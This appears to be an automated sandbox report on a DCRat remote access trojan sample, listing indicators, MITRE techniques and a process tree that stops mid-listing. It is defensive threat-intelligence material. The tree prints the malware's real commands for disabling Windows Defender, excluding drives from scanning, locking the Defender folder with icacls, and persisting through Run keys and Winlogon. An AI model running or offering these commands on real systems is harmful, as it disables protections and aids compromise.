dcrat | b82f23ee8617e7ad47d7513fe175e7211564eed5442002927a415d7a035da5cf

Resubmissions

26-12-2022 00:04

221226-acrmcafe2y 10

26-12-2022 00:03

26-12-2022 00:03

26-12-2022 00:03

26-12-2022 00:02

26-12-2022 00:01

Analysis

max time kernel
48s
max time network
154s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
26-12-2022 00:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

15.7MB
MD5

b27e540aef37c99f3cfd2766c2e61784
SHA1

c516b74daec17d1bc788c54433cf10899ee07e92
SHA256

28ebd60f492ca0957ac7ab3fdbcd8262966dee60dbec71d6bcac8d7efaf65479
SHA512

641d5daaef91d535f279ce7fea1f7c8b50ba87040480602e51951dfc2f3345699d3161d38b1b2ab7b3d4fbbcc56e0d597f125ed65ea3971df4888cb4a63897cd
SSDEEP

393216:XhBqJ0CE8/eXkkM7cGGBNpuXU8ysXVqNIyc2KBcr27eEHTPX:RBe0CiMihuXU8yYqNIygdrX

Score

10^/10

dcrat discovery evasion exploit infostealer persistence rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ipinfo.io/ip

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies WinLogon for persistence 2 TTPs 5 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

ComdriverSvc.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\runtimeMonitor\\dllhost.exe\", \"C:\\Users\\Default\\Links\\WmiPrvSE.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\runtimeMonitor\\dllhost.exe\", \"C:\\Users\\Default\\Links\\WmiPrvSE.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\dllhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\runtimeMonitor\\dllhost.exe\", \"C:\\Users\\Default\\Links\\WmiPrvSE.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\csrss.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\runtimeMonitor\\dllhost.exe\", \"C:\\Users\\Default\\Links\\WmiPrvSE.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\csrss.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Resource\\TypeSupport\\winlogon.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\runtimeMonitor\\dllhost.exe\""	ComdriverSvc.exe

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

1.exe1.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "3"	1.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "3"	1.exe

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2588	4928	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1976	4928	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4052	4928	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4584	4928	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4704	4928	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4264	4928	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4844	4928	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4248	4928	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1012	4928	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4360	4928	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4776	4928	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3952	4928	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3988	4928	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3116	4928	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3716	4928	schtasks.exe

DCRat payload 7 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\ProgramData\dc.exe	dcrat
C:\programdata\dc.exe	dcrat
C:\runtimeMonitor\ComdriverSvc.exe	dcrat
behavioral13/memory/3980-1574-0x00000000003D0000-0x00000000004DC000-memory.dmp	dcrat
C:\runtimeMonitor\ComdriverSvc.exe	dcrat
C:\Program Files\Windows Multimedia Platform\dllhost.exe	dcrat
C:\Program Files\Windows Multimedia Platform\dllhost.exe	dcrat

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Executes dropped EXE 8 IoCs

Processes:

1.exeany.exeschtasks.exe1.exewsappz.exeComdriverSvc.exeAnyDesk.exedllhost.exe

pid process

1748 1.exe
2168 any.exe
1012 schtasks.exe
4256 1.exe
2652 wsappz.exe
3980 ComdriverSvc.exe
4700 AnyDesk.exe
4528 dllhost.exe

pid	process
1748	1.exe
2168	any.exe
1012	schtasks.exe
4256	1.exe
2652	wsappz.exe
3980	ComdriverSvc.exe
4700	AnyDesk.exe
4528	dllhost.exe

Possible privilege escalation attempt 16 IoCs

exploit

Processes:

takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
3976	takeown.exe
4316	icacls.exe
4284	icacls.exe
4932	icacls.exe
3972	icacls.exe
2656	icacls.exe
6064	icacls.exe
5648	icacls.exe
348	icacls.exe
1396	icacls.exe
4640	icacls.exe
2332	icacls.exe
4028	icacls.exe
2016	icacls.exe
4924	icacls.exe
4424	icacls.exe

Modifies file permissions 1 TTPs 16 IoCs

discovery

File Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
2016	icacls.exe
4424	icacls.exe
4924	icacls.exe
4932	icacls.exe
3976	takeown.exe
4640	icacls.exe
4316	icacls.exe
2656	icacls.exe
2332	icacls.exe
4284	icacls.exe
4028	icacls.exe
6064	icacls.exe
5648	icacls.exe
3972	icacls.exe
348	icacls.exe
1396	icacls.exe

Windows security modification 2 TTPs 4 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

1.exe1.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection	1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiSpyware = "1"	1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection	1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	1.exe

Adds Run key to start application 2 TTPs 10 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ComdriverSvc.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Windows Multimedia Platform\\dllhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Windows Multimedia Platform\\dllhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\BitLockerDiscoveryVolumeContents\\csrss.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Resource\\TypeSupport\\winlogon.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Resource\\TypeSupport\\winlogon.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\runtimeMonitor\\dllhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Users\\Default\\Links\\WmiPrvSE.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\BitLockerDiscoveryVolumeContents\\csrss.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\runtimeMonitor\\dllhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Users\\Default\\Links\\WmiPrvSE.exe\""	ComdriverSvc.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

20 ipinfo.io
21 ipinfo.io

flow	ioc
20	ipinfo.io
21	ipinfo.io

Drops file in System32 directory 2 IoCs

Processes:

1.exe1.exe

description	ioc	process
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	1.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	1.exe

Drops file in Program Files directory 4 IoCs

Processes:

ComdriverSvc.exe

description	ioc	process
File created	C:\Program Files\Windows Multimedia Platform\dllhost.exe	ComdriverSvc.exe
File created	C:\Program Files\Windows Multimedia Platform\5940a34987c991	ComdriverSvc.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\winlogon.exe	ComdriverSvc.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\cc11b995f2a76d	ComdriverSvc.exe

Drops file in Windows directory 2 IoCs

Processes:

ComdriverSvc.exe

description	ioc	process
File created	C:\Windows\BitLockerDiscoveryVolumeContents\csrss.exe	ComdriverSvc.exe
File created	C:\Windows\BitLockerDiscoveryVolumeContents\886983d96e3d3e	ComdriverSvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
4704	schtasks.exe
1976	schtasks.exe
4052	schtasks.exe
4248	schtasks.exe
3116	schtasks.exe
3716	schtasks.exe
2588	schtasks.exe
4264	schtasks.exe
4776	schtasks.exe
1012	schtasks.exe
4360	schtasks.exe
3952	schtasks.exe
3988	schtasks.exe
4584	schtasks.exe
4844	schtasks.exe

Delays execution with timeout.exe 6 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

6116 timeout.exe
5936 timeout.exe
1740 timeout.exe
1248 timeout.exe
3628 timeout.exe
5080 timeout.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

5504 tasklist.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

4632 taskkill.exe
3240 taskkill.exe

pid	process
6116	timeout.exe
5936	timeout.exe
1740	timeout.exe
1248	timeout.exe
3628	timeout.exe
5080	timeout.exe

pid	process
5504	tasklist.exe

pid	process
4632	taskkill.exe
3240	taskkill.exe

Modifies registry class 8 IoCs

Processes:

wsappz.exeschtasks.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\",0"	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\" --play \"%1\""	wsappz.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings	schtasks.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk	wsappz.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exe1.exe

pid	process
4244	powershell.exe
4244	powershell.exe
4244	powershell.exe
2640	powershell.exe
2640	powershell.exe
2640	powershell.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe
1748	1.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

powershell.exepowershell.exe1.exetaskkill.exepowershell.exepowershell.exeComdriverSvc.exepowershell.exepowershell.exepowershell.exebackgroundTaskHost.exepowershell.exedllhost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4244	powershell.exe
Token: SeDebugPrivilege	2640	powershell.exe
Token: SeDebugPrivilege	1748	1.exe
Token: SeAssignPrimaryTokenPrivilege	1748	1.exe
Token: SeIncreaseQuotaPrivilege	1748	1.exe
Token: 0	1748	1.exe
Token: SeDebugPrivilege	4632	taskkill.exe
Token: SeDebugPrivilege	3240	powershell.exe
Token: SeDebugPrivilege	4680	powershell.exe
Token: SeDebugPrivilege	3980	ComdriverSvc.exe
Token: SeDebugPrivilege	4616	powershell.exe
Token: SeDebugPrivilege	4580	powershell.exe
Token: SeDebugPrivilege	4664	powershell.exe
Token: SeDebugPrivilege	3240	powershell.exe
Token: SeDebugPrivilege	420	backgroundTaskHost.exe
Token: SeDebugPrivilege	640	powershell.exe
Token: SeDebugPrivilege	4528	dllhost.exe
Token: SeDebugPrivilege	4672	powershell.exe
Token: SeDebugPrivilege	3844	powershell.exe
Token: SeDebugPrivilege	864	powershell.exe
Token: SeDebugPrivilege	4644	powershell.exe
Token: SeDebugPrivilege	288	powershell.exe
Token: SeDebugPrivilege	1528	powershell.exe
Token: SeDebugPrivilege	1368	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

1.exe1.exe

pid process

1748 1.exe
4256 1.exe

pid	process
1748	1.exe
4256	1.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tmp.execmd.exeany.execmd.exeschtasks.execmd.exenet.exenet.exenet.exeWScript.exe

description	pid	process	target process
PID 2960 wrote to memory of 4244	2960	tmp.exe	powershell.exe
PID 2960 wrote to memory of 4244	2960	tmp.exe	powershell.exe
PID 2960 wrote to memory of 4244	2960	tmp.exe	powershell.exe
PID 2960 wrote to memory of 2640	2960	tmp.exe	powershell.exe
PID 2960 wrote to memory of 2640	2960	tmp.exe	powershell.exe
PID 2960 wrote to memory of 2640	2960	tmp.exe	powershell.exe
PID 2960 wrote to memory of 1748	2960	tmp.exe	1.exe
PID 2960 wrote to memory of 1748	2960	tmp.exe	1.exe
PID 2960 wrote to memory of 1748	2960	tmp.exe	1.exe
PID 2960 wrote to memory of 2120	2960	tmp.exe	cmd.exe
PID 2960 wrote to memory of 2120	2960	tmp.exe	cmd.exe
PID 2960 wrote to memory of 2120	2960	tmp.exe	cmd.exe
PID 2960 wrote to memory of 2168	2960	tmp.exe	any.exe
PID 2960 wrote to memory of 2168	2960	tmp.exe	any.exe
PID 2960 wrote to memory of 2168	2960	tmp.exe	any.exe
PID 2960 wrote to memory of 1012	2960	tmp.exe	schtasks.exe
PID 2960 wrote to memory of 1012	2960	tmp.exe	schtasks.exe
PID 2960 wrote to memory of 1012	2960	tmp.exe	schtasks.exe
PID 2120 wrote to memory of 4092	2120	cmd.exe	cmd.exe
PID 2120 wrote to memory of 4092	2120	cmd.exe	cmd.exe
PID 2120 wrote to memory of 4092	2120	cmd.exe	cmd.exe
PID 2168 wrote to memory of 4564	2168	any.exe	cmd.exe
PID 2168 wrote to memory of 4564	2168	any.exe	cmd.exe
PID 2168 wrote to memory of 4564	2168	any.exe	cmd.exe
PID 4092 wrote to memory of 2972	4092	cmd.exe	chcp.com
PID 4092 wrote to memory of 2972	4092	cmd.exe	chcp.com
PID 4092 wrote to memory of 2972	4092	cmd.exe	chcp.com
PID 1012 wrote to memory of 392	1012	schtasks.exe	WScript.exe
PID 1012 wrote to memory of 392	1012	schtasks.exe	WScript.exe
PID 1012 wrote to memory of 392	1012	schtasks.exe	WScript.exe
PID 4092 wrote to memory of 5080	4092	cmd.exe	timeout.exe
PID 4092 wrote to memory of 5080	4092	cmd.exe	timeout.exe
PID 4092 wrote to memory of 5080	4092	cmd.exe	timeout.exe
PID 4564 wrote to memory of 4700	4564	cmd.exe	AnyDesk.exe
PID 4564 wrote to memory of 4700	4564	cmd.exe	AnyDesk.exe
PID 4564 wrote to memory of 4700	4564	cmd.exe	AnyDesk.exe
PID 4564 wrote to memory of 1612	4564	cmd.exe	net.exe
PID 4564 wrote to memory of 1612	4564	cmd.exe	net.exe
PID 4564 wrote to memory of 1612	4564	cmd.exe	net.exe
PID 1612 wrote to memory of 3416	1612	net.exe	net1.exe
PID 1612 wrote to memory of 3416	1612	net.exe	net1.exe
PID 1612 wrote to memory of 3416	1612	net.exe	net1.exe
PID 4564 wrote to memory of 4100	4564	cmd.exe	net.exe
PID 4564 wrote to memory of 4100	4564	cmd.exe	net.exe
PID 4564 wrote to memory of 4100	4564	cmd.exe	net.exe
PID 4100 wrote to memory of 4904	4100	net.exe	net1.exe
PID 4100 wrote to memory of 4904	4100	net.exe	net1.exe
PID 4100 wrote to memory of 4904	4100	net.exe	net1.exe
PID 4564 wrote to memory of 2696	4564	cmd.exe	net.exe
PID 4564 wrote to memory of 2696	4564	cmd.exe	net.exe
PID 4564 wrote to memory of 2696	4564	cmd.exe	net.exe
PID 2696 wrote to memory of 3488	2696	net.exe	net1.exe
PID 2696 wrote to memory of 3488	2696	net.exe	net1.exe
PID 2696 wrote to memory of 3488	2696	net.exe	net1.exe
PID 4564 wrote to memory of 4632	4564	cmd.exe	taskkill.exe
PID 4564 wrote to memory of 4632	4564	cmd.exe	taskkill.exe
PID 4564 wrote to memory of 4632	4564	cmd.exe	taskkill.exe
PID 4564 wrote to memory of 3240	4564	cmd.exe	powershell.exe
PID 4564 wrote to memory of 3240	4564	cmd.exe	powershell.exe
PID 4564 wrote to memory of 3240	4564	cmd.exe	powershell.exe
PID 4564 wrote to memory of 4680	4564	cmd.exe	powershell.exe
PID 4564 wrote to memory of 4680	4564	cmd.exe	powershell.exe
PID 4564 wrote to memory of 4680	4564	cmd.exe	powershell.exe
PID 392 wrote to memory of 3972	392	WScript.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2960

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4244

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2640

C:\programdata\1.exe
"C:\programdata\1.exe" /D
2⤵
- Modifies security service
- Executes dropped EXE
- Windows security modification
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1748

C:\programdata\1.exe
"C:\programdata\1.exe" /S 1
3⤵
- Modifies security service
- Executes dropped EXE
- Windows security modification
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4256

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"
3⤵
- Suspicious use of WriteProcessMemory
PID:4092

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:2972

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:5080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" dir "C:\ProgramData\Microsoft\Windows Defender" "
4⤵
PID:1524

C:\Windows\SysWOW64\findstr.exe
findstr /i "Platform"
4⤵
PID:4860

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2016

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4424

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "TrustedInstaller:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4284

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4924

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "Users:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4028

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6064

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4932

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "EVERYONE:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5648

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\
4⤵
PID:5744

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq Superfetch.exe"
4⤵
- Enumerates processes with tasklist
PID:5504

C:\Windows\SysWOW64\find.exe
find /I /N "Superfetch.exe"
4⤵
PID:6040

C:\Windows\SysWOW64\takeown.exe
takeown /f c:\windows\tasks
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3976

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:1740

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3972

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:348

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1396

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4640

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4316

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2656

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2332

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:3628

\??\c:\programdata\migrate.exe
c:\programdata\migrate.exe -p4432
4⤵
PID:5124

C:\programdata\any.exe
"C:\programdata\any.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2168

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\programdata\any.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:4564

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:4700

C:\Windows\SysWOW64\net.exe
net stop TaskSc
4⤵
- Suspicious use of WriteProcessMemory
PID:1612

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TaskSc
5⤵
PID:3416

C:\Windows\SysWOW64\net.exe
net stop TaskScs
4⤵
- Suspicious use of WriteProcessMemory
PID:4100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TaskScs
5⤵
PID:4904

C:\Windows\SysWOW64\net.exe
net stop AnyDesk
4⤵
- Suspicious use of WriteProcessMemory
PID:2696

C:\Windows\SysWOW64\net1.exe
